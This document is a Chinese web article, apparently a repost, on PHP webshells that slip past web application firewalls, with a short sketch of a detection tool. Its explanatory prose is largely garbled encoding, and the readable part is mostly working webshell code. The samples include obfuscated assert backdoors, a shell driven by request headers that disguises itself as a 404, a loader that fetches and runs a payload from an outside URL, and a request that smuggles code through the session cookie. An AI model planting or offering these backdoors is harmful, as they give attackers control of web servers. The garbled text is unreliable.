安科网

PHP常见过waf webshell以及最简单的检测方法

xiejianming

xiejianming

2019-06-25

关注 关注

åè¨

ä¹åå¨Webshellæ¥æçæ°æ路中çäºä¸ä¸ªå ️ï¼å½æ¶æ²¡ææ¾å°å·ä½æ¾å°å¨é¨åéçæ¹æ³ï¼åæ¥éè¿å­¦ä¹ æ¾å°äºä¸ªæå°å¨é¨éçæ¹æ³ï¼å¹¶å次学习äºä¸PHP webshellç»è¿WAFçæ¹æ³ï¼ä»¥æ­¤æ¥éªè¯ä¸æ­¤æ¹æ³æ¯å¦åçã

å¦æé误ï¼è¿è¯·æåºï¼ä¸èææ¿ï¼ :turtle:æ

å¨é£ç¯æ章中æçªç¶æ³å°ä¸ç§æ£æµwebshellçæ¹æ³ï¼å°±æ¯é¦åè·åå°å½åæ件中çææåéï¼ä¸æç½çå¯ä»¥åå»çä¸ä¹åçæç« ï¼ï¼ç¶ååæ ¹æ®æ­£ååºè¿è¡éææ£æµã

èªè®¤ä¸ºè¿ç§æ¹æ³è½ç¶ä¼æ£æµä¸å®å¨ï¼æ¯ä¸ªæ£æµæºå¶é½ä¸è½ä¿éå¨é¨ææï¼ï¼ä½æ¯æè§é常ç®åãå®ç¨ï¼ä¹æ²¡é£ä¹å¤é«æ·±çéçã

为äºéªè¯è¯¥æ£æµæºå¶ï¼é¦åäºè§£ä¸ç®åPHP webshellç»è¿WAFçæ¹æ³ã

常è§ç»è¿WAFçPHP webshell

å­ç¬¦ä¸²åå½¢

大å°åãç¼ç ãæªåãæ¿æ¢ãç¹æ®å­ç¬¦æ¼æ¥ãnullãå车ãæ¢è¡ãç¹æ®å­ç¬¦ä¸²å¹²æ°

<?php
$a = base64_decode("YXNzYXNz+00000____");
$a = substr_replace($a,"ert",3);
$a($_POST['x']);
?>

ucwords()
ucfirst()
trim()
substr_replace()
substr()
strtr()
strtoupper()
strtolower()
strtok()
str_rot13()
chr()
gzcompress()ãgzdeflate()ãgzencode()
gzuncompress()ãgzinflate()ãgzdecode()
base64_encode()
base64_decode()
pack()
unpack()

èªåå½æ°

å©ç¨ assert()

<?php 
function test($a){
  $a($_POST['x']);
}
test(assert);
?>

åè°å½æ°

<?php 
call_user_func(assert,array($_POST[x]));
?>

call_user_func_array()
array_filter() 
array_walk() 
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var() 
filter_var_array() 
uasort() 
uksort() 
array_reduce()
array_walk() 
array_walk_recursive()
forward_static_call_array()

ç±»

å©ç¨é­æ¯æ¹æ³ãææå½æ° __destruct() ï¼ __construct()

<?php 
class test
{
 public $a = '';
 function __destruct(){
  assert("$this->a");
 }
}
$b = new test;
$b->a = $_POST['x'];
?>

å©ç¨å¤é¨æ件

å©ç¨ curl , fsockopen ç­åèµ·ç½ç»è¯·æ±åç»å file_get_contents

<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",
'687474703a2f2f7777772e77326e31636b2e636f6d2f7368656c6c2f312e6a7067'),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>

æ å­ç¬¦ç¹å¾é©¬

ç¼ç ãå¼æãèªå¢

<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);
?>

ç¹æ®è¯·æ±å¤´

å©ç¨ getallheaders()

<?php
$cai=getallheaders()['cai'];
$dao=getallheaders()['dao'];
if($cai!="" and $dao!=""){
 $cai=gzuncompress(base64_decode($cai));$cai(gzuncompress(base64_decode($dao)));
}
header('HTTP/1.1 404 Not Found');
?>

å¨å±åé

å©ç¨ getenv() ï¼ arrag_flip() ï¼ get_defined_vars() ï¼ session_id()

import requests
url = 'http://localhost/?code=eval(hex2bin(session_id(session_start())));'
payload = "phpinfo();".encode('hex')
cookies = {
 'PHPSESSID':payload
}
r = requests.get(url=url,cookies=cookies)
print r.content

PHPæ··æ·å è§£å¯

以phpjiami为ä¾

å°±æ¯å°å½æ°åãåéåå¨é¨åæâä¹±ç âï¼ä¸æ¹å¨ä»»æä¸ä¸ªå°æ¹ï¼é½å°å¯¼è´æ件ä¸è½è¿è¡ãå·ä½å¯è®¿é®ï¼ https://www.phpjiami.com/

PHP webshellæ£æµæ¹æ³

ç®åææäºè§£çwebshellæ£æµæ¹å¼æï¼

  1. æºå¨å­¦ä¹ æ£æµwebshellï¼æ¯å¦æ··æ·åº¦ãæé¿åè¯ãéåææ°ãç¹å¾ãå缩æ¯ç­
  2. å¨ææ£æµï¼æ²ç®±ï¼
  3. åºäºæµé模å¼æ£æµwebshellï¼agent
  4. éåç®æ³+éæå¹éæ£æµwebshellï¼æ¯å¦Dç¾webshellæ¥æ
  5. æ ¹æ®æ件å¥åº¦åºåº¦æ¥æ£æµ

å®ä¾å±ç¤º

è¿é以PHPjiamiçwebshell为ä¾ï¼å¶ä¸­ 2.php å³ä¸ºphpjiamaçæ¨é©¬

PHP常见过waf webshell以及最简单的检测方法

å¯ä»¥ææ¾çå°ææ¾çwebshellè§åäºï¼è¿æ ·åç¨éæè§åãæ­£åç­å³å¯è½»æ¾æ£æµå°ã

ç®åæ£æµæè·¯

æ£æµæè·¯ï¼

æ件ä¸ä¼ ->æ件åå«->è·åæææ件中çåéå°ä¸´æ¶æ件中->éæè§åå¹é临æ¶æ件->è¿åå¹éç»æ

âââ __init__.py
âââ conf
â   âââ __init__.py
â   âââ config.py
âââ core
â   âââ __init__.py
â   âââ all_check.py
â   âââ data_mysql.py
â   âââ file_inotify.py
âââ lib
â   âââ __init__.py
â   âââ semantic_analysis_api.py
âââ test
â   âââ __init__.py
â   âââ file_md5_move.py
â   âââ os_check.py
â   âââ random_file_test.py
â   âââ ...
âââ web
â   âââ static
â   â   âââ css
â   â   â   âââ main.css
â   â   âââ images
â   â   â   âââ background.jpg
â   â   âââ js
â   â       âââ upload.js
â   âââ templates
â   â   âââ index.html
â   âââ upload_file.php
â   âââ include_file_to_tmp.php
âââ webshell_check.py

conf中åå«çæ¯è¯¸å¦ä¸åçéææ£æµè§å

PHP常见过waf webshell以及最简单的检测方法

æ»ç»

以ä¸å°±æ¯è¿ç¯æç« çå¨é¨å容äºï¼å¸ææ¬æçå容对大家ç学习æèå·¥ä½å·æä¸å®çåè学习价å¼ï¼è°¢è°¢å¤§å®¶å¯¹èæ¬ä¹å®¶çæ¯æã

webshell php waf assert

xiejianming

xiejianming

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

PHP-WebShell-Bypass-WAF

WebShell 的输入点在$_GET和$_POST,执行点在eval(),经典的一句话WAF 都会拦截。可以发现,安全狗是通过综合判断来识别WebShell 的,现在,我们有两种的绕过方式:关键字绕过和混淆绕过。一般来说,WAF 里边的拦截规则都是使用了

Nicolase 2019-10-20

浅谈无字母数字构造webshell

//$hint = "php function getFlag() to get flag";读一下代码,我们要对code进行传参,code的参数在经过变换后以不含字母数字的形式构造任意字符,并且字符串的长度小于40,但php7中,a

xiaobater 2020-02-02

WebShell代码分析溯源(二)

php $POST[‘POST‘]=‘assert‘;$array[]=$POST;$array[0][‘POST‘];?>

Sabrina 2019-10-30

sqlmap从入门到精通-第四章-4-2 SQL Server获取webshell及提权基础

主要架构ASP+MSSQL+IIS或者ASP.NET+MSSQL+IIS ,PHP和JSP架构也是支持MSSQL. 通过翻查conn.aspx, config.aspx, conn.asp, config.asp, config.php, web.conf

bluet00 2020-06-25

腾讯Wiz课程第三讲,文件上传漏洞的分析

如果上传文件的路径、文件名、扩展名都是用户可控的数据,然后木马脚本就会在web服务器上面搞事情。有问题是在文件上传之后,服务器的处理方式、解释文件如果出现了问题,就会导致错误,就是漏洞的来源。文件上传时候审查不严。webshell常常被称为入侵者通过网站端

bigNoseLiu 2020-06-15

MySQL提权之udf提权(无webshell的情况)

select @@basedir; //查找到mysql的目录select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCA

Jieen 2020-05-30

web shell

可以上传任意文件的情况,包括上传脚本文件。非法用户可以利用上传的恶意脚本文件控制整个网站,甚至控制服务器。文件,又称之为 webshell,也可将 webshell 脚本称为一种网页后门,webshell 脚本具有强大。的功能,比如查看服务器目录,服务器中

酷云的csdn 2020-05-28

加密Webshell“冰蝎” 流量 100%识别

0x01 "冰蝎" 获取密钥过程冰蝎执行流程 冰蝎在连接webshell的时,会对webshell进行两次请求访问为什么进行两次访问?0x04 总结Waf可以对一个ip连续访问2次的数据包进行截取,比对相同字符,比对之后,截取两次不同的

Sabrina 2020-04-22

墨者学院WebShell文件上传分析溯源(第2题)Write

今天看文章看到一道比较有意思的题,复现并记录一下,友情提示,这个靶场经常经常经常出问题,如果发现路径无法访问等问题,重启解决就好~访问提示后台,访问admin/upload.php会显示没有权限,并有一个upload1.php页面一闪而过,随后跳转到upl

pimshell 2020-04-06

阿里云网站被植入Webshell的解决方案

本文介绍了Webshell的概念、入侵原理以及防护方法,帮助您抵御Webshell入侵,避免其带来的数据泄露等危害。Webshell指匿名用户(入侵者)通过网站端口,获取网站服务器的一定操作权限。Webshell通常是以ASP、PHP、JSP、ASA或者C

伏雌摘星阁 2020-03-03

script webshell jspWebShell / pythonWebShell / phpWebShell

simplejee是一个开源的面向j2ee初学者的小项目。顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的

懒人的小窝 2011-06-11

2019 EIS高校安全运维赛 misc webshell

code = re.sub("chr", "chr", code, flags=re.IGNORECASE). <?php. @ini_set("display_errors", "

Parco的IT运维 2020-02-03

PHP利用Apache、Nginx的特性实现免杀Webshell

另外一种通过执行伪造的sessionid值,进行任意代码执行。

Jieen 2019-12-30

p神之webshell禁止执行

也可以在结果发生后,不允许webshell执行

chenjia00 2019-12-31

代码注入/文件包含 弹出Meterpreter

目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息。此模块支持在本地监听一个端口,别人一旦访问该端口就会将该端口内的文件读取至本地执行。

liushun 2019-12-16

WINDOWS服务器IIS解析漏洞维护办法,防止WEBSHELL入侵!

本站服务器经过更换2012版后 网站经常被人拿WEBSHELL篡改文件!找了半天也找不到漏洞在哪好在微信好友Carry的帮忙下找出了漏洞,并给出了以下的修改方案我是根据方案3修复的,在这里给大家分享下

SciRui 2019-12-14

注册表无法访问 解决方案

点按“确定”关闭对话框。

kxr00 2015-01-18

linux 取消上传文件存储目录执行脚本的权限防御WebShell攻击

所以漏洞的关键就在上传的目录是否具备执行脚本的权限上,很多设计者会基于降低成本的考虑,将存储上传文件的位置与Web应用程序放在同一服务器,甚至同一目录下,这样上传的目录也和Web应用程序一样具备执行脚本的权限,从而导致系统产生了一个高危上传漏洞。

jinkun00 2015-08-17

黑客必学之“网页木马webshell”

首先简单说一下webshell,webshell简单来说就是黑客植入的后门,它可以帮助我们黑客控制网站,就好像电脑木马控制电脑一样。我们可以jifeng=phpinfo()这个函数,然后执行,它就会正常去执行phpinfo(),那么jifeng就相当于一个

Yyqingmofeige 2019-11-08

WebShell代码分析溯源(十一)

Tick是一个在declare代码段中解释器每执行n条低级语句就会发生的事件。

赵家小少爷 2019-11-03
xiejianming

xiejianming

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号